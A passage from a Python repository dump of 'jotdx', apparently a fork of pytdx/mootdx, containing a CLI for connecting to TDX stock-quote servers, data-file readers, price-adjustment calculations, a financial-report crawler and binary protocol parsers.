(2, ['华泰证券(南京电信)', '172.16.58.3:7709']),
(3, ['华泰证券(上海电信)', '172.16.17.32:7709']),
(4, ['华泰证券(上海电信二)', '192.168.3.11:7709']),
(5, ['华泰证券(深圳电信)', '172.16.17.32:7709']),
(6, ['华泰证券(武汉电信)', '192.168.127.12:7709']),
(7, ['华泰证券(天津联通)', '172.16.17.32:7709']),
(8, ['华泰证券(沈阳联通)', '172.16.17.32:7709']),
(9, ['华泰证券(南京联通)', '172.16.31.10:7709']),
(10, ['华泰证券(南京联通)', '172.16.31.10:7709']),
])
def connect():
while True:
click.secho("请选择服务器")
click.secho("-" * 20)
for k,v in SERVERS.items():
click.secho("[%d] :%s (%s)" % (k, v[0], v[1]))
click.secho("-" * 20)
num = click.prompt("请输入序号 ", type=int, default=1)
if num not in SERVERS:
click.echo("序号错误")
continue
ip,port = SERVERS[num][1].split(":")
c = api.connect(ip, int(port))
if not c:
raise Exception("无法连接")
else:
break
def connect_to(ipandport):
ip, port = ipandport.split(":")
c = api.connect(ip, int(port))
if not c:
raise Exception("无法连接")
def disconnect():
api.disconnect()
if sys.version_info[0] == 2:
reload(sys)
sys.setdefaultencoding('utf8')
FUNCTION_LIST_STR = "0 : 使用交互式接口\n"
for x, y in FUNCTION_LIST.items():
FUNCTION_LIST_STR = FUNCTION_LIST_STR + str(x) + " : " + y[0] + "\n"
@click.command()
@click.option('-f', '--function', default=0, type=click.INT, help="选择使用的功能" + "\n" + FUNCTION_LIST_STR)
@click.option('--df/--no-df', default=True, help="是否使用Pandas Dataframe显示")
@click.option('-o', '--output', default="-", help="保存到文件,默认不保存")
@click.option('-s', '--server', default="-", type=click.STRING, help="连接的服务器,设定之后直接连接该服务器,无需选择" )
@click.option('--all/--no-all', default=False, help="显示全部服务器列表")
def main(function, df, output, server, all):
"""
股票行情获取程序, 作者RainX<<EMAIL>>
"""
if all:
global SERVERS
SERVERS = OrderedDict([(idx+1, [host[0], "%s:%s" % (host[1], host[2])]) for idx, host in enumerate(hq_hosts)])
click.secho("连接中.... ", fg="green")
if server == '-':
connect()
else:
connect_to(server)
click.secho("连接成功!", fg="green")
if function == 0:
while True:
click.secho("-" * 20)
click.secho("功能列表:")
for (k,v) in FUNCTION_LIST.items():
click.secho(str(k) + " : " + v[0], bold=True)
last = k + 1
click.secho(str(last) + " : 退出断开连接", bold=True)
click.secho("-" * 20)
value = click.prompt('请输入要使用的功能', type=int)
if value == last:
break
run_function(df, value)
click.secho("-" * 20)
click.echo("按任意键继续")
click.getchar()
elif function in FUNCTION_LIST.keys():
value = function
result = run_function(df, value)
if (result is not None) and (output != "-"):
click.secho("写入结果到 " + output)
if isinstance(result, pd.DataFrame):
result.to_csv(output)
else:
with open(output, "wb") as f:
pickle.dump(result, f)
click.secho("断开连接中.... ", fg="green")
disconnect()
click.secho("断开连接成功!", fg="green")
def run_function(df, value):
click.secho("你选择的是功能 " + str(value) + " : " + FUNCTION_LIST[value][0])
click.secho("-" * 20)
click.secho(FUNCTION_LIST[value][1])
params_str = click.prompt("请输入参数 ", type=str, default=FUNCTION_LIST[value][3])
params = [p.strip() for p in params_str.split(",")]
click.secho("-" * 20)
try:
result = FUNCTION_LIST[value][2](params)
if df:
result = api.to_df(result)
click.secho(str(result), bold=True)
return result
else:
pprint.pprint(result)
return result
except Exception as e:
import traceback
print('-' * 60)
traceback.print_exc(file=sys.stdout)
print('-' * 60)
click.secho("发生错误,错误信息为: " + str(e), fg='red')
if __name__ == '__main__':
main()
```
#### File: jotdx/bin/hqreader.py
```python
from __future__ import unicode_literals, division
import click
import sys
import os
if __name__ == '__main__':
sys.path.insert(0, os.path.dirname(os.path.dirname(os.path.dirname(os.path.realpath(__file__)))))
from pytdx.reader import TdxDailyBarReader, TdxFileNotFoundException, TdxNotAssignVipdocPathException
from pytdx.reader import TdxMinBarReader
from pytdx.reader import TdxLCMinBarReader
from pytdx.reader import TdxExHqDailyBarReader
from pytdx.reader import GbbqReader
from pytdx.reader import BlockReader
from pytdx.reader import CustomerBlockReader
from pytdx.reader.history_financial_reader import HistoryFinancialReader
import pandas as pd
# 让pandas 显示全部数据
pd.set_option('display.max_columns', None)
pd.set_option('display.max_rows', None)
Help_Text = '''
数据文件格式,
- daily 代表日K线
- ex_daily 代表扩展行情的日线
- min 代表5分钟或者1分钟线
- lc 代表lc1, lc5格式的分钟线
- gbbq 股本变迁文件
- block 读取板块股票列表文件
- customblock 读取自定义板块列表
- history_financial 或者 hf 历史财务信息 如 gpcw20170930.dat 或者 gpcw20170930.zip
'''
@click.command()
@click.argument("input", type=click.Path(exists=True))
@click.option("-o", '--output', help="")
@click.option("-d", "--datatype", default="daily", help=Help_Text)
def main(input, output, datatype):
"""
通达信数据文件读取
"""
if datatype == 'daily':
reader = TdxDailyBarReader()
elif datatype == 'ex_daily':
reader = TdxExHqDailyBarReader()
elif datatype == 'lc':
reader = TdxLCMinBarReader()
elif datatype == 'gbbq':
reader = GbbqReader()
elif datatype == 'block':
reader = BlockReader()
elif datatype == 'customblock':
reader = CustomerBlockReader()
elif datatype == 'history_financial' or datatype == 'hf':
reader = HistoryFinancialReader()
else:
reader = TdxMinBarReader()
try:
df = reader.get_df(input)
if output:
click.echo("写入到文件 : " + output)
df.to_csv(output)
else:
print(df)
except Exception as e:
print(str(e))
if __name__ == '__main__':
main()
```
#### File: jotdx/contrib/fuquan.py
```python
import pandas as pd
from mootdx.quotes import Quotes
def calc_fuquan_use_fenhong(df, df_fenhong):
"""获取复权后的历史数据, 用分红表来计算复权 , 前复权
df: 日k线
df_fenhong: 分红表
return: df"""
# 日期早的在前面
# 经过测试, 前复权结果与同花顺,通达信的计算相同
df_fenhong = df_fenhong.sort_index(by=2)
for i in range(len(df_fenhong)):
gu, money, date = df_fenhong.irow(i)
if len(df.ix[:date]) < 2:
continue
# 比对日期
date = agl.df_get_pre_date(df, date)
if money > 0:
money = money * 0.1
df['o'].ix[:date] -= money
df['h'].ix[:date] -= money
df['c'].ix[:date] -= money
df['l'].ix[:date] -= money
if gu > 0:
# x = cur / (1+y/10)
gu = 1 + gu / 10
df['o'].ix[:date] /= gu
df['h'].ix[:date] /= gu
df['c'].ix[:date] /= gu
df['l'].ix[:date] /= gu
return df
def make_fq(symbol='', method='00'):
client = Quotes.factory(market='std')
data = client.bars(symbol=symbol)
xdxr = client.xdxr(symbol=symbol).query('category==1')
if method:
return make_qfq(data, xdxr, method)
return data
# present bonus price rationed
# 展示 奖金 价格 配给
def make_qfq(data, xdxr, fq_type='01'):
"""使用数据库数据进行复权"""
# 过滤其他,只留除权信息
xdxr = xdxr.query('category==1')
# data = data.assign(if_trade=1)
if len(xdxr) > 0:
# 有除权信息, 合并原数据 + 除权数据
# data = pd.concat([data, xdxr.loc[data.index[0]:data.index[-1], ['category']]], axis=1)
# data['if_trade'].fillna(value=0, inplace=True)
data = data.fillna(method='ffill')
# present bonus price rationed
# songzhuangu fenhong peigujia peigu
data = pd.concat([data, xdxr.loc[data.index[0]:data.index[-1], ['fenhong', 'peigu', 'peigujia', 'songzhuangu']]], axis=1)
else:
# 没有除权信息
data = pd.concat([data, xdxr.loc[:, ['fenhong', 'peigu', 'peigujia', 'songzhuangu']]], axis=1)
# 清理数据
data = data.fillna(0)
if fq_type == '01':
# 生成 preclose todo 关键位置
# for key,val in ea.iterrows():
# date = key - datetime.timedelta(days=1)
# for field in df.columns.values:
# if field != 'volume' and field != 'amount':
# df.iloc[date:, field] -= val.bonus/10
# df.iloc[date:, field] += val.price*(val.rationed/10)
# df.iloc[date:, field] /= 1 + val.present/10 + val.rationed/10
# -= val.bonus / 10 == @todo
df1 = (data['close'].shift(1) * 10 - data['fenhong'] + data['peigu'] * data['peigujia'])
df2 = (10 + data['peigu'] + data['songzhuangu'])
data['preclose'] = (data['close'].shift(1) * 10 - data['fenhong'] + data['peigu'] * data['peigujia']) / (10 + data['peigu'] + data['songzhuangu'])
# 生成 adj 复权因子
data['adj'] = (data['preclose'].shift(-1) / data['close']).fillna(1)[::-1].cumprod()
else:
# 生成 preclose todo 关键位置
data['preclose'] = (data['close'].shift(1) * 10 - data['fenhong'] + data['peigu'] * data['peigujia']) / (10 + data['peigu'] + data['songzhuangu'])
# 生成 adj 复权因子
data['adj'] = (data['close'] / data['preclose'].shift(-1)).cumprod().shift(1).fillna(1)
# 计算复权价格
for field in data.columns.values:
if field in ('open', 'close', 'high', 'low', 'preclose'):
data[field] = data[field] * data['adj']
# 清理数据, 返回结果
return data.query('open != 0').drop(['fenhong', 'peigu', 'peigujia', 'songzhuangu', ], axis=1)
# def make_hfq(bfq_data, xdxr_data):
# """使用数据库数据进行复权"""
# info = xdxr_data.query('category==1')
# bfq_data = bfq_data.assign(if_trade=1)
#
# if len(info) > 0:
# # 合并数据
# data = pd.concat([bfq_data, info.loc[bfq_data.index[0]:bfq_data.index[-1], ['category']]], axis=1)
# data['if_trade'].fillna(value=0, inplace=True)
#
# data = data.fillna(method='ffill')
# data = pd.concat([data, info.loc[bfq_data.index[0]:bfq_data.index[-1], ['fenhong', 'peigu', 'peigujia', 'songzhuangu']]], axis=1)
# else:
# data = pd.concat([bfq_data, info.loc[:, ['category', 'fenhong', 'peigu', 'peigujia', 'songzhuangu']]], axis=1)
#
# data = data.fillna(0)
#
# # 生成 preclose todo 关键位置
# data['preclose'] = (data['close'].shift(1) * 10 - data['fenhong'] + data['peigu'] * data['peigujia']) / (10 + data['peigu'] + data['songzhuangu'])
# data['adj'] = (data['close'] / data['preclose'].shift(-1)).cumprod().shift(1).fillna(1)
#
# # 计算复权价格
# for field in data.columns.values:
# if field in ('open', 'close', 'high', 'low', 'preclose'):
# data[field] = data[field] * data['adj']
#
# # data['open'] = data['open'] * data['adj']
# # data['high'] = data['high'] * data['adj']
# # data['low'] = data['low'] * data['adj']
# # data['close'] = data['close'] * data['adj']
# # data['preclose'] = data['preclose'] * data['adj']
#
# # 不计算 交易量
# # data['volume'] = data['volume'] / data['adj'] if 'volume' in data.columns else data['vol'] / data['adj']
#
# try:
# data['high_limit'] = data['high_limit'] * data['adj']
# data['low_limit'] = data['high_limit'] * data['adj']
# except:
# pass
#
# return data.query('if_trade==1 and open != 0').drop(['fenhong', 'peigu', 'peigujia', 'songzhuangu', 'if_trade', 'category'], axis=1)
```
#### File: jotdx/crawler/history_financial_crawler.py
```python
from struct import calcsize, unpack
from jotdx.crawler.base_crawler import BaseCralwer
import shutil
import tempfile
import random
import os
import six
if six.PY2:
import zipfile
"""
https://github.com/rainx/jotdx/issues/133
获取历史财务数据的接口,参考上面issue里面 @datochan 的方案和代码
"""
class HistoryFinancialListCrawler(BaseCralwer):
def __init__(self):
self.mode = "content"
def get_url(self, *args, **kwargs):
return "https://gitee.com/yutiansut/QADATA/raw/master/financial/content.txt"
def get_content(self, reporthook=None, path_to_download=None, proxies=None, chunksize=1024 * 50, *args, **kwargs):
from jotdx.hq import TdxHq_API
api = TdxHq_API()
api.need_setup = False
# calc.tdx.com.cn, calc2.tdx.com.cn
with api.connect(ip="192.168.3.11"):
content = api.get_report_file_by_size("tdxfin/gpcw.txt")
if path_to_download is None:
download_file = tempfile.NamedTemporaryFile(delete=True)
else:
download_file = open(path_to_download, 'wb')
download_file.write(content)
download_file.seek(0)
return download_file
def parse(self, download_file, *args, **kwargs):
content = download_file.read()
content = content.decode("utf-8")
def list_to_dict(l):
return {
'filename': l[0],
'hash': l[1],
'filesize': int(l[2])
}
result = [list_to_dict(l) for l in [line.strip().split(",") for line in content.strip().split('\n')]]
return result
class HistoryFinancialCrawler(BaseCralwer):
def __init__(self):
self.mode = "content"
def get_url(self, *args, **kwargs):
if 'filename' in kwargs:
filename = kwargs['filename']
else:
raise Exception("Param filename is not set")
return "http://data.yutiansut.com/{}".format(filename)
def get_content(self, reporthook=None, path_to_download=None, proxies=None, chunksize=1024 * 50, *args, **kwargs):
if 'filename' in kwargs:
filename = kwargs['filename']
else:
raise Exception("Param filename is not set")
if "filesize" in kwargs:
filesize = kwargs["filesize"]
else:
filesize = 0
from jotdx.hq import TdxHq_API
api = TdxHq_API()
api.need_setup = False
# calc.tdx.com.cn, calc2.tdx.com.cn
with api.connect(ip="192.168.3.11"):
content = api.get_report_file_by_size("tdxfin/" + filename, filesize=filesize, reporthook=reporthook)
if path_to_download is None:
download_file = tempfile.NamedTemporaryFile(delete=True)
else:
download_file = open(path_to_download, 'wb')
download_file.write(content)
download_file.seek(0)
return download_file
def parse(self, download_file, *args, **kwargs):
header_pack_format = '<1hI1H3L'
if download_file.name.endswith('.zip'):
tmpdir_root = tempfile.gettempdir()
subdir_name = "pytdx_" + str(random.randint(0, 1000000))
tmpdir = os.path.join(tmpdir_root, subdir_name)
shutil.rmtree(tmpdir, ignore_errors=True)
os.makedirs(tmpdir)
if six.PY2:
with zipfile.ZipFile(download_file.name, 'r') as zf:
zf.extractall(tmpdir)
else:
shutil.unpack_archive(download_file.name, extract_dir=tmpdir)
# only one file endswith .dat should be in zip archives
datfile = None
for _file in os.listdir(tmpdir):
if _file.endswith(".dat"):
datfile = open(os.path.join(tmpdir, _file), "rb")
if datfile is None:
raise Exception("no dat file found in zip archive")
else:
datfile = download_file
header_size = calcsize(header_pack_format)
stock_item_size = calcsize("<6s1c1L")
data_header = datfile.read(header_size)
stock_header = unpack(header_pack_format, data_header)
max_count = stock_header[2]
report_date = stock_header[1]
report_size = stock_header[4]
report_fields_count = int(report_size / 4)
report_pack_format = '<{}f'.format(report_fields_count)
results = []
for stock_idx in range(0, max_count):
datfile.seek(header_size + stock_idx * calcsize("<6s1c1L"))
si = datfile.read(stock_item_size)
stock_item = unpack("<6s1c1L", si)
code = stock_item[0].decode("utf-8")
foa = stock_item[2]
datfile.seek(foa)
info_data = datfile.read(calcsize(report_pack_format))
cw_info = unpack(report_pack_format, info_data)
one_record = (code, report_date) + cw_info
results.append(one_record)
if download_file.name.endswith('.zip'):
datfile.close()
shutil.rmtree(tmpdir, ignore_errors=True)
return results
def to_df(self, data):
if len(data) == 0:
return None
total_lengh = len(data[0])
col = ['code', 'report_date']
length = total_lengh - 2
for i in range(0, length):
col.append("col" + str(i + 1))
df = pd.DataFrame(data=data, columns=col)
df.set_index('code', inplace=True)
return df
if __name__ == '__main__':
import pandas as pd
from jotdx.crawler.base_crawler import demo_reporthook
crawler = HistoryFinancialListCrawler()
#
list_data = crawler.fetch_and_parse(reporthook=demo_reporthook)
df = pd.DataFrame(data=list_data)
print(df["filename"])
print(df["filename"].str.contains("gpcw20190630.zip").any())
# 读取其中一个
# filename = list_data[1]['filename']
# filesize = list_data[1]["filesize"]
# datacrawler = HistoryFinancialCrawler()
# pd.set_option('display.max_columns', None)
# result = datacrawler.fetch_and_parse(reporthook=demo_reporthook, filename=filename, filesize=filesize, path_to_download="/tmp/tmpfile.zip")
# print(result)
# with open(r"/tmp/tmpfile.zip", "rb") as fp:
# result = datacrawler.parse(download_file=fp)
# print(datacrawler.to_df(data=result))
```
#### File: jotdx/jotdx/logger.py
```python
import sys
from loguru import logger
logger.remove()
def getLogger(quiet=None, verbose=None) -> logger: # noqa
level = ('INFO', 'DEBUG')[bool(verbose)]
logger.remove()
quiet or logger.add(sys.stderr, level=level)
return logger
def reset(verbose: int = 0, **kwargs) -> logger: # noqa
"""
重置 logger 等级函数
:param verbose: 等级级别 0 - 3
:param kwargs:
:return:
"""
levels = ['WARNING', 'INFO', 'DEBUG', 'TRACE']
level0 = levels[-1] if verbose > len(levels) else levels[verbose]
logger.remove()
logger.add(sys.stdout, level=level0, filter='mootdx')
# logger.add(sys.stdout, filter=lambda record: "message" in record["extra"], format="<level>{message}</level>")
return logger
def setup(verbose: int = 0, **kwargs) -> logger: # noqa
return reset(verbose=verbose, **kwargs)
def config(verbose: int = 0, **kwargs) -> logger: # noqa
return reset(verbose=verbose, **kwargs)
```
#### File: jotdx/parser/base.py
```python
from jotdx.log import DEBUG, log
import zlib
import struct
import sys
import datetime
try:
import cython
if cython.compiled:
def buffer(x):
return x
except ImportError:
pass
class SocketClientNotReady(Exception):
pass
class SendPkgNotReady(Exception):
pass
class SendRequestPkgFails(Exception):
pass
class ResponseHeaderRecvFails(Exception):
pass
class ResponseRecvFails(Exception):
pass
RSP_HEADER_LEN = 0x10
class BaseParser(object):
def __init__(self, client, lock=None):
self.client = client
self.data = None
self.send_pkg = None
self.rsp_header = None
self.rsp_body = None
self.rsp_header_len = RSP_HEADER_LEN
self.category = None
self.market = None
self.code = None
if lock:
self.lock = lock
else:
self.lock = None
def setParams(self, *args, **xargs):
"""
构建请求
:return:
"""
pass
def parseResponse(self, body_buf):
pass
def setup(self):
pass
def call_api(self):
if self.lock:
with self.lock:
log.debug("sending thread lock api call")
result = self._call_api()
else:
result = self._call_api()
return result
def _call_api(self):
self.setup()
if not (self.client):
raise SocketClientNotReady("socket client not ready")
if not (self.send_pkg):
raise SendPkgNotReady("send pkg not ready")
nsended = self.client.send(self.send_pkg)
self.client.send_pkg_num += 1
self.client.send_pkg_bytes += nsended
self.client.last_api_send_bytes = nsended
if self.client.first_pkg_send_time is None:
self.client.first_pkg_send_time = datetime.datetime.now()
if DEBUG:
log.debug("send package:" + str(self.send_pkg))
if nsended != len(self.send_pkg):
log.debug("send bytes error")
raise SendRequestPkgFails("send fails")
else:
head_buf = self.client.recv(self.rsp_header_len)
if DEBUG:
log.debug("recv head_buf:" + str(head_buf) + " |len is :" + str(len(head_buf)))
if len(head_buf) == self.rsp_header_len:
self.client.recv_pkg_num += 1
self.client.recv_pkg_bytes += self.rsp_header_len
_, _, _, zipsize, unzipsize = struct.unpack("<IIIHH", head_buf)
if DEBUG:
log.debug("zip size is: " + str(zipsize))
body_buf = bytearray()
last_api_recv_bytes = self.rsp_header_len
while True:
buf = self.client.recv(zipsize)
len_buf = len(buf)
self.client.recv_pkg_num += 1
self.client.recv_pkg_bytes += len_buf
last_api_recv_bytes += len_buf
body_buf.extend(buf)
if not (buf) or len_buf == 0 or len(body_buf) == zipsize:
break
self.client.last_api_recv_bytes = last_api_recv_bytes
if len(buf) == 0:
log.debug("接收数据体失败服务器断开连接")
raise ResponseRecvFails("接收数据体失败服务器断开连接")
if zipsize == unzipsize:
log.debug("不需要解压")
else:
log.debug("需要解压")
if sys.version_info[0] == 2:
unziped_data = zlib.decompress(buffer(body_buf))
else:
unziped_data = zlib.decompress(body_buf)
body_buf = unziped_data
## 解压
if DEBUG:
log.debug("recv body: ")
log.debug(body_buf)
return self.parseResponse(body_buf)
else:
log.debug("head_buf is not 0x10")
raise ResponseHeaderRecvFails("head_buf is not 0x10 : " + str(head_buf))
```
#### File: jotdx/parser/ex_get_minute_time_data.py
```python
from jotdx.parser.base import BaseParser
from jotdx.helper import get_datetime, get_volume, get_price
from collections import OrderedDict
import struct
"""
tradex 结果
7、查询分时...
时间 价格 均价 成交量 成交额
09:30 3706.199951 3706.199951 27 13336
09:31 3705.199951 3705.910400 11 13335
09:32 3704.600098 3705.473633 19 13328
09:33 3701.399902 3704.717041 13 13324
09:34 3700.800049 3704.556152 3 13323
09:35 3699.800049 3703.379395 24 13321
09:36 3695.800049 3702.544922 12 13319
09:37 3700.600098 3702.510010 2 13318
"""
class GetMinuteTimeData(BaseParser):
def setParams(self, market, code):
pkg = bytearray.fromhex("01 07 08 00 01 01 0c 00 0c 00 0b 24")
code = code.encode("utf-8")
pkg.extend(struct.pack('<B9s', market, code))
self.send_pkg = pkg
def parseResponse(self, body_buf):
pos = 0
market, code, num = struct.unpack('<B9sH', body_buf[pos: pos+12])
pos += 12
result = []
for i in range(num):
(raw_time, price, avg_price, volume, amount) = struct.unpack("<HffII", body_buf[pos: pos+18])
pos += 18
hour = raw_time // 60
minute = raw_time % 60
result.append(OrderedDict([
("hour", hour),
("minute", minute),
("price", price),
("avg_price", avg_price),
("volume", volume),
("open_interest", amount),
]))
return result
```
#### File: jotdx/parser/get_history_transaction_data.py
```python
from jotdx.parser.base import BaseParser
from jotdx.helper import get_datetime, get_volume, get_price, get_time
from collections import OrderedDict
import struct
import six
class GetHistoryTransactionData(BaseParser):
def setParams(self, market, code, start, count, date):
if type(code) is six.text_type:
code = code.encode("utf-8")
if type(date) is (type(date) is six.text_type) or (type(date) is six.binary_type):
date = int(date)
pkg = bytearray.fromhex(u'0c 01 30 01 00 01 12 00 12 00 b5 0f')
pkg.extend(struct.pack("<IH6sHH", date, market, code, start, count))
self.send_pkg = pkg
def parseResponse(self, body_buf):
pos = 0
(num, ) = struct.unpack("<H", body_buf[:2])
pos += 2
ticks = []
# skip 4 bytes
pos += 4
last_price = 0
for i in range(num):
### ?? get_time
# \x80\x03 = 14:56
hour, minute, pos = get_time(body_buf, pos)
price_raw, pos = get_price(body_buf, pos)
vol, pos = get_price(body_buf, pos)
buyorsell, pos = get_price(body_buf, pos)
_, pos = get_price(body_buf, pos)
last_price = last_price + price_raw
tick = OrderedDict(
[
("time", "%02d:%02d" % (hour, minute)),
("price", float(last_price)/100),
("vol", vol),
("buyorsell", buyorsell),
]
)
ticks.append(tick)
return ticks
if __name__ == '__main__':
from jotdx.hq import TdxHq_API
api = TdxHq_API()
with api.connect():
print(api.to_df(api.get_history_transaction_data(0, '000001', 0, 10, 20170811)))
```
#### File: jotdx/parser/get_security_list.py
```python
from jotdx.parser.base import BaseParser
from jotdx.helper import get_datetime, get_volume, get_price
from collections import OrderedDict
import struct
class GetSecurityList(BaseParser):
def setParams(self, market, start):
pkg = bytearray.fromhex(u'0c 01 18 64 01 01 06 00 06 00 50 04')
pkg_param = struct.pack("<HH", market, start)
pkg.extend(pkg_param)
self.send_pkg = pkg
def parseResponse(self, body_buf):
pos = 0
(num, ) = struct.unpack("<H", body_buf[:2])
pos += 2
stocks = []
for i in range(num):
# b'880023d\x00\xd6\xd0\xd0\xa1\xc6\xbd\xbe\xf9.9\x04\x00\x02\x9a\x99\x8cA\x00\x00\x00\x00'
# 880023 100 中小平均 276782 2 17.575001 0 80846648
one_bytes = body_buf[pos: pos + 29]
(code, volunit,
name_bytes, reversed_bytes1, decimal_point,
pre_close_raw, reversed_bytes2) = struct.unpack("<6sH8s4sBI4s", one_bytes)
code = code.decode("utf-8")
name = name_bytes.decode("gbk",errors = "ignore").rstrip("\x00")
pre_close = get_volume(pre_close_raw)
pos += 29
one = OrderedDict(
[
('code', code),
('volunit', volunit),
('decimal_point', decimal_point),
('name', name),
('pre_close', pre_close),
]
)
stocks.append(one)
return stocks
```
#### File: jotdx/utils/adjust.py
```python
import datetime
import time
from pathlib import Path
import httpx
import pandas as pd
import simplejson as json
from tenacity import retry
from tenacity import stop_after_attempt
from tenacity import wait_fixed
from jotdx.consts import return_last_value
@retry(wait=wait_fixed(2), retry_error_callback=return_last_value, stop=stop_after_attempt(5))
def fq_factor(method: str, symbol: str) -> pd.DataFrame:
zh_sina_a_stock_hfq_url = 'https://finance.sina.com.cn/realstock/company/{}/hfq.js'
zh_sina_a_stock_qfq_url = 'https://finance.sina.com.cn/realstock/company/{}/qfq.js'
client = httpx.Client(verify=False)
if method == 'hfq':
res = client.get(zh_sina_a_stock_hfq_url.format(symbol))
hfq_factor_df = pd.DataFrame(json.loads(res.text.split('=')[1].split('\n')[0])['data'])
if hfq_factor_df.shape[0] == 0:
raise ValueError('sina hfq factor not available')
hfq_factor_df.columns = ['date', 'hfq_factor']
hfq_factor_df.index = pd.to_datetime(hfq_factor_df.date)
del hfq_factor_df['date']
hfq_factor_df.reset_index(inplace=True)
# hfq_factor_df = hfq_factor_df.set_index('date')
return hfq_factor_df
else:
res = client.get(zh_sina_a_stock_qfq_url.format(symbol))
qfq_factor_df = pd.DataFrame(json.loads(res.text.split('=')[1].split('\n')[0])['data'])
if qfq_factor_df.shape[0] == 0:
raise ValueError('sina hfq factor not available')
qfq_factor_df.columns = ['date', 'qfq_factor']
qfq_factor_df.index = pd.to_datetime(qfq_factor_df.date)
del qfq_factor_df['date']
qfq_factor_df.reset_index(inplace=True)
# qfq_factor_df = qfq_factor_df.set_index('date')
return qfq_factor_df
def get_xdxr(symbol, client):
from mootdx import get_config_path
cache_file = Path(get_config_path(f'xdxr/{symbol}.plk'))
cache_file.parent.mkdir(exist_ok=True)
# 判断数据是否存在, 判断修改时间是否今天
today = time.mktime(datetime.date.today().timetuple())
if cache_file.is_file() and cache_file.stat().st_mtime > today:
xdxr = pd.read_pickle(cache_file)
else:
xdxr = client.xdxr(symbol=symbol)
xdxr.to_pickle(cache_file)
return xdxr
def to_adjust(temp_df, symbol=None, adjust=None, client=None):
from mootdx.tools.reversion import reversion
xdxr_data = get_xdxr(symbol=symbol, client=client)
return reversion(temp_df, xdxr_data, adjust)
def to_adjust2(temp_df, symbol=None, adjust=None):
# zh_sina_a_stock_hfq_url = "https://finance.sina.com.cn/realstock/company/{}/hfq.js"
# zh_sina_a_stock_qfq_url = "https://finance.sina.com.cn/realstock/company/{}/qfq.js"
temp_df['volume'] = temp_df['vol']
temp_df['date'] = pd.to_datetime(temp_df[['year', 'month', 'day']])
temp_df = temp_df.set_index('date')
if adjust == 'hfq':
# res = requests.get(zh_sina_a_stock_hfq_url.format(symbol))
# hfq_factor_df = pd.DataFrame(eval(res.text.split("=")[1].split("\n")[0])["data"])
# hfq_factor_df.columns = ["date", "hfq_factor"]
# hfq_factor_df.index = pd.to_datetime(hfq_factor_df.date)
hfq_factor_df = fq_factor(symbol=symbol, method=adjust)
del hfq_factor_df['date']
temp_df = pd.merge(temp_df, hfq_factor_df, left_index=True, right_index=True, how='outer')
temp_df.fillna(method='ffill', inplace=True)
temp_df = temp_df.astype(float)
temp_df.dropna(inplace=True)
temp_df.drop_duplicates(subset=['open', 'high', 'low', 'close', 'volume'], inplace=True)
for field in ['open', 'high', 'low', 'close']:
temp_df[field] = round(temp_df[field] * temp_df['hfq_factor'], 2)
temp_df = temp_df.iloc[:, :-1]
# temp_df = temp_df[start_date:end_date]
temp_df.dropna(inplace=True)
temp_df.reset_index(inplace=True)
return temp_df
if adjust == 'qfq':
# res = requests.get(zh_sina_a_stock_qfq_url.format(symbol))
# qfq_factor_df = pd.DataFrame(eval(res.text.split("=")[1].split("\n")[0])["data"])
# qfq_factor_df.columns = ["date", "qfq_factor"]
# qfq_factor_df.index = pd.to_datetime(qfq_factor_df.date)
qfq_factor_df = fq_factor(symbol=symbol, method=adjust)
qfq_factor_df = qfq_factor_df.set_index('date')
# del qfq_factor_df["date"]
temp_df = pd.merge(temp_df, qfq_factor_df, left_index=True, right_index=True, how='outer')
temp_df.fillna(method='ffill', inplace=True)
# temp_df = temp_df.astype(float)
for field in ['open', 'high', 'low', 'close', 'volume', 'qfq_factor']:
temp_df[field] = temp_df[field].astype(float)
temp_df.dropna(inplace=True)
temp_df.drop_duplicates(subset=['open', 'high', 'low', 'close', 'volume'], inplace=True)
for field in ['open', 'high', 'low', 'close']:
temp_df[field] = round(temp_df[field] / temp_df['qfq_factor'], 2)
temp_df = temp_df.iloc[:, :-1]
temp_df.dropna(inplace=True)
temp_df.reset_index(inplace=True)
print(temp_df)
return temp_df
return temp_df
```
#### File: jotdx/utils/__init__.py
```python
import hashlib
import pandas as pd
from pandas import DataFrame
from pathlib import Path
from struct import calcsize
from struct import unpack
from tqdm import tqdm
from jotdx.consts import MARKET_BJ
from jotdx.consts import MARKET_SH
from jotdx.consts import MARKET_SZ
from jotdx.logger import logger
def get_stock_markets(symbols=None):
results = []
assert isinstance(symbols, list), 'stock code need list type'
if isinstance(symbols, list):
for symbol in symbols:
results.append([get_stock_market(symbol, string=False), symbol.strip('sh').strip('sz')])
return results
def get_stock_market(symbol='', string=False):
""" 判断股票ID对应的证券市场匹配规则
['50', '51', '60', '90', '110'] 为 sh
['00', '12','13', '18', '15', '16', '18', '20', '30', '39', '115'] 为 sz
['5', '6', '9'] 开头的为 sh, 其余为 sz
:param string: False 返回市场ID,否则市场缩写名称
:param symbol: 股票ID, 若以 'sz', 'sh' 开头直接返回对应类型,否则使用内置规则判断
:return 'sh' or 'sz'
"""
assert isinstance(symbol, str), 'stock code need str type'
market = 'sh'
if symbol.startswith(('sh', 'sz', 'SH', 'SZ')):
market = symbol[:2].lower()
elif symbol.startswith(('50', '51', '60', '68', '90', '110', '113', '132', '204')):
market = 'sh'
elif symbol.startswith(('00', '12', '13', '18', '15', '16', '18', '20', '30', '39', '115', '1318')):
market = 'sz'
elif symbol.startswith(('5', '6', '9', '7')):
market = 'sh'
elif symbol.startswith(('4', '8')):
market = 'bj'
if string is False:
if market == 'sh':
market = MARKET_SH
if market == 'sz':
market = MARKET_SZ
if market == 'bj':
market = MARKET_BJ
logger.debug(f'market=>{market}')
return market
def gpcw(filepath):
cw_file = open(filepath, 'rb')
header_size = calcsize('<3h1H3L')
stock_item_size = calcsize('<6s1c1L')
data_header = cw_file.read(header_size)
stock_header = unpack('<3h1H3L', data_header)
max_count = stock_header[3]
for idx in range(0, max_count):
cw_file.seek(header_size + idx * calcsize('<6s1c1L'))
si = cw_file.read(stock_item_size)
stock_item = unpack('<6s1c1L', si)
code = stock_item[0].decode()
foa = stock_item[2]
cw_file.seek(foa)
info_data = cw_file.read(calcsize('<264f'))
cw_info = unpack('<264f', info_data)
logger.debug(f'{code}, {cw_info}')
return code, cw_info
def md5sum(downfile):
"""
文件的 md5 哈希值
:param downfile: 文件路径
:return: mixed
"""
try:
md5_l = hashlib.md5()
md5_l.update(Path(downfile).read_bytes())
return md5_l.hexdigest()
except (IOError, FileNotFoundError) as e:
logger.error(f'无法读取文件: {downfile}')
logger.debug(e)
return None
def to_data(v, **kwargs):
"""
数值转换为 pd.DataFrame
:param v: mixed
:return: pd.DataFrame
"""
symbol = kwargs.get('symbol')
adjust = kwargs.get('adjust', None)
client = kwargs.get('client', None)
if adjust in ['01', 'qfq', 'before']:
